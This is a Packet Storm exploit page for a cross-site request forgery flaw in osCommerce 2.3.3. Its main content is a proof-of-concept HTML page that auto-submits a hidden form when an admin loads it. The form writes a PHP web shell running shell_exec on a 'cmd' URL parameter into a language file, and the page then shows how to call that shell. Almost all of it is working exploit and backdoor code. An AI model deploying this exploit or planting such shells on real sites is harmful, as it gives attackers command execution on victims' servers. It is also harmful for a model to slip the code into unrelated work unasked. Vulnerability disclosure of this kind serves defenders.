osCommerce version 2.3.3 suffers from a cross site request forgery vulnerability.
6899dfd0aba24fae96fc8aca3b04644601579d6527c6c1b6a86f31ffeb009ade<?php
/*
* this is simple proof-of-c0ncept for csrf in latest
osCommerce (2.3.3).
*
* Admin, after visiting this page, will add php-shell-code to file:
* ./catalog/includes/languages/english/download.php, so now if we
* add 'cmd' param to this file, our 'shell' will print command output.
*
* --- there should be more this kind of bugs in this webapp.
* 22.o1.2o13 o/
*/
?>
<html><body onload="document.runCSRF.submit();">
<form method="post" name="runCSRF"
action="http://oscommerce-2.3.3/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">
<input type="hidden" name="file_contents"
value="<?php $cmd = $_GET['cmd']; echo '<pre>' . shell_exec($cmd) . '</pre>'; ?>">
</form>your shell should be here:
catalog/includes/languages/english/download.php?cmd=id<br></body></html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed